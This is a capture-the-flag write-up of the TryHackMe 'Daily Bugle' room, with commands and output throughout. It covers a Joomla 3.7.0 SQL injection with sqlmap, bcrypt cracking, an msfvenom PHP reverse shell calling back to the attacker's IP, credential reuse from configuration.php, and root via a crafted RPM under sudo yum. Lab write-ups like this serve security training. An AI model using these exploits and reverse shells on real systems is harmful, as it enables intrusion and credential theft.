---
layout: post
title: "Daily Bugle - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - linux
  - eop
  - sqli
  - hash
  - cracking
  - web
date: 2020/11/14 23:24:00
thumbnail: /images/TryHackMe/daily_bugle.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Daily Bugle
- **Profile:** [tryhackme.com](https://tryhackme.com/room/dailybugle)
- **Difficulty:** Hard
- **Description**: Compromise a Joomla CMS account via SQLi, practice cracking hashes and escalate your privileges by taking advantage of yum.

![Daily Bugle](/images/TryHackMe/daily_bugle.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S fingerprinter sqlmap haiti exploitdb metasploit pwncat gtfoblookup rpm-tools
```

## [Task 1] Deploy

> Access the web server, who robbed the bank?

Answer: {% spoiler spiderman %}

## [Task 2] Obtain user and root

> What is the Joomla version?

Answer: {% spoiler 3.7.0 %}

```
$ fingerprinter -a joomla -f http://10.10.48.170/
Unique Match! v3.7.0 - http://10.10.48.170/administrator/manifests/files/joomla.xml -> 5f60cd80d2657d0c4f5b7bd1df2f05ce
Unique Match! v3.7.0 - http://10.10.48.170/administrator/language/en-GB/en-GB.xml -> 13409f150e694e3958503b3846b6173f
Unique Match! v3.7.0 - http://10.10.48.170/language/en-GB/en-GB.xml -> 91671f23b5debfb674d81ee18aa29dfc
Unique Match! v3.7.0 - http://10.10.48.170/administrator/language/en-GB/install.xml -> e2158c14b6c601cca9de1764e635185d
Unique Match! v3.7.0 - http://10.10.48.170/language/en-GB/install.xml -> 7dfa1d81271843d868f3e559b096eda6
Unique Match! v3.7.0 - http://10.10.48.170/administrator/manifests/packages/pkg_en-GB.xml -> 3c7f077d2c0fc9dd100c8bb92e6bf933
Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/administrator/language/en-GB/en-GB.ini -> 1a85a35a9edf33a6e30e47840f5200d8
Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/administrator/templates/isis/css/template.css -> 33d3849912ba97449ffdc4f1c59a597b
Intersection of potential versions is only one: v3.7.0 - http://10.10.48.170/language/en-GB/en-GB.ini -> e941ae1d5df991499c3059396f0e4f93
...
Very likely to be v3.7.0
```

> What is Jonah's cracked password?

Answer: {% spoiler spiderman123 %}

```
$ searchsploit joomla 3.7.0
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                          | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting                       | php/webapps/43488.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 42033
  Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
      URL: https://www.exploit-db.com/exploits/42033
     Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
File Type: ASCII text, with CRLF line terminators

$ sqlmap -u "http://10.10.48.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]'
...
---
Parameter: list[fullordering] (GET)
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 9580 FROM(SELECT COUNT(*),CONCAT(0x7178717071,(SELECT (ELT(9580=9580,1))),0x717a767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[19:45:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:45:32] [INFO] fetching database names
[19:45:36] [INFO] retrieved: 'information_schema'
[19:45:38] [INFO] retrieved: 'joomla'
[19:45:40] [INFO] retrieved: 'mysql'
[19:45:41] [INFO] retrieved: 'performance_schema'
[19:45:43] [INFO] retrieved: 'test'
available databases [5]:
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] test
...

$ sqlmap -u "http://10.10.48.170/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --random-agent -p 'list[fullordering]' -D joomla -T '#__users' -C username,password --dump
...
Database: joomla
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| jonah    | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm |
+----------+--------------------------------------------------------------+
...

$ haiti '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
Blowfish(OpenBSD) [HC: 3200] [JtR: bcrypt]
Woltlab Burning Board 4.x
bcrypt [HC: 3200] [JtR: bcrypt]

$ john hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=bcrypt
...
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123     (jonah)
1g 0:00:04:39 DONE (2020-11-11 19:56) 0.003581g/s 167.7p/s 167.7c/s 167.7C/s thebadboy..spaceship
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

> What is the user flag?

Answer: {% spoiler xxx %}

The login page: http://10.10.48.170/administrator/

Replace a page of a template by a PHP reverse shell at: http://10.10.48.170/administrator/index.php?option=com_templates&view=template&id=506&file=L2Vycm9yLnBocA%3D%3D

Create the PHP reverse shell:

```
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.19.77 LPORT=8080 -f raw > noraj.php
```

Start a listener:

```
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.9.19.77
LHOST => 10.9.19.77
msf6 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf6 exploit(multi/handler) > run
```

Execute the reverse shell: http://10.10.48.170/templates/protostar/error.php

From the reverse shell:

```
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ export TERM=xterm

bash-4.2$ id
uid=48(apache) gid=48(apache) groups=48(apache)

bash-4.2$ pwd
/var/www/html/templates/protostar

bash-4.2$ cd ../..

bash-4.2$ ls -1
LICENSE.txt
README.txt
administrator
bin
cache
cli
components
configuration.php
htaccess.txt
images
includes
index.php
language
layouts
libraries
media
modules
plugins
robots.txt
templates
tmp
web.config.txt

bash-4.2$  cat configuration.php | grep -i password -n
17:     public $password = 'nv5uz9r3ZEDzVjNu';

bash-4.2$ head -17 configuration.php | tail -2
        public $user = 'root';
        public $password = 'nv5uz9r3ZEDzVjNu';

bash-4.2$ ls -l /home
drwx------. 2 jjameson jjameson 99 Dec 15  2019 jjameson

bash-4.2$ su jjameson
Password: nv5uz9r3ZEDzVjNu

[jjameson@dailybugle html]$ cd

[jjameson@dailybugle ~]$ ls
user.txt

[jjameson@dailybugle ~]$ cat user.txt
27a260fe3cba712cfdedb1c86d80442e
```

> What is the root flag?

Answer: {% spoiler xxx %}

```
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```

Let's find a way to EoP with yum:

~~~
gtfoblookup linux sudo yum
yum:

    sudo:

        Description: It runs commands using a specially crafted RPM
                     package. Generate it with
                     [fpm](https://github.com/jordansissel/fpm) and upload it to
                     the target.
                     ```
                     TF=$(mktemp -d)
                     echo 'id' > $TF/x.sh
                     fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
                     ```
        Code: sudo yum localinstall -y x-1.0-1.noarch.rpm

        Description: Spawn interactive root shell by loading a custom
                     plugin.
        Code: TF=$(mktemp -d)
              cat >$TF/x<<EOF
              [main]
              plugins=1
              pluginpath=$TF
              pluginconfpath=$TF
              EOF
              cat >$TF/y.conf<<EOF
              [main]
              enabled=1
              EOF
              cat >$TF/y.py<<EOF
              import os
              import yum
              from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
              requires_api_version='2.1'
              def init_hook(conduit):
                os.execl('/bin/sh','/bin/sh')
              EOF
              sudo yum -c $TF/x --enableplugin=y
~~~

[Install](https://fpm.readthedocs.io/en/latest/installing.html) [FPM](https://github.com/jordansissel/fpm):

```
$ asdf local ruby 2.7.1
$ gem install --no-document fpm
$ sudo pacman -S rpm-tools
```

Then prepare the exploit:

```
TF=$(mktemp -d)
echo '/bin/sh' > $TF/x.sh
$ fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF
```

It created x-1.0-1.noarch.rpm

Serve it with a one line web server:

```
$ ruby -run -ehttpd . -p8080
```

Then on the target:

```
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cd $TF
[jjameson@dailybugle tmp.rnJQbjyT19]$ wget http://10.9.19.77:8080/x-1.0-1.noarch.rpm
[jjameson@dailybugle tmp.rnJQbjyT19]$ sudo /usr/bin/yum localinstall -y x-1.0-1.noarch.rpm
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# cd 
sh-4.2# cat root.txt
eec3d53292b1821868266858d7fa6f79
```
